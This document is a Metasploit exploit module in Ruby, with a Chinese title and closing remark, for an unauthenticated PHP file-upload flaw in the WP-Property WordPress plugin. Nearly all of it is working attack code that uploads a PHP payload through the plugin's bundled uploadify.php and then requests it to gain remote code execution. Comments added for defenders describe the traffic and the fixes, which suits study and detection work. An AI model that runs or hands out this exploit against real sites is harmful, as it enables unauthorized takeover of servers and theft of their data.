WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

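# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (per the description below, versions <= 1.35.0).
#
# Reviewer notes for defenders, derived from the requests this module sends:
# * The traffic is a multipart POST to
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php with a
#   "Filedata" part whose filename ends in ".php" and a "folder" part, followed
#   by a GET for whatever path the server returned in the response body.
#   Both requests are sent without any session or credentials.
# * Removing or denying access to the bundled uploadify.php, and disabling PHP
#   execution in directories that accept uploads, addresses the condition this
#   module relies on; updating the plugin past the affected range is the
#   primary fix.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, references, targets) and the TARGETURI
  # option, which defaults to '/wordpress'.
  #
  # @param info [Hash] metadata overrides passed through to update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the uploadify.php script with a single GET request.
  #
  # NOTE(review): an HTTP 200 only shows that the script is reachable. Nothing
  # here inspects the plugin version or the response body, so "Appears" is an
  # indication that the file exists, not confirmation that the host is
  # vulnerable. Any other outcome (no response, non-200) maps to "Unknown".
  #
  # @return [Exploit::CheckCode::Appears, Exploit::CheckCode::Unknown]
  def check
    uri = target_uri.path
    uri = "#{uri}/" unless uri.end_with?('/')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Sends the two requests the module is built around: a multipart POST to
  # uploadify.php carrying the generated file, then a GET for the location the
  # server echoed back.
  #
  # Fails with UnexpectedReply when the upload response is missing, is not a
  # 200, or does not contain the generated file name.
  def exploit
    uri = target_uri.path
    uri = "#{uri}/" unless uri.end_with?('/')

    peer = "#{rhost}:#{rport}"

    # Random five-letter name; the ".php" extension is what a defender would
    # see in the multipart filename and in the follow-up GET.
    @payload_name = "#{rand_text_alpha(5)}.php"
    # Helper comes from the PhpEXE mixin; presumably :unlink_self makes the
    # dropped file remove itself after it runs -- confirm against the mixin.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a boundary marker at the start of a line.
    # NOTE(review): presumably needed for the server to parse the body -- confirm.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the path of the second request.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end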
不要问我这写的是什么 怎么利用 我是说msf.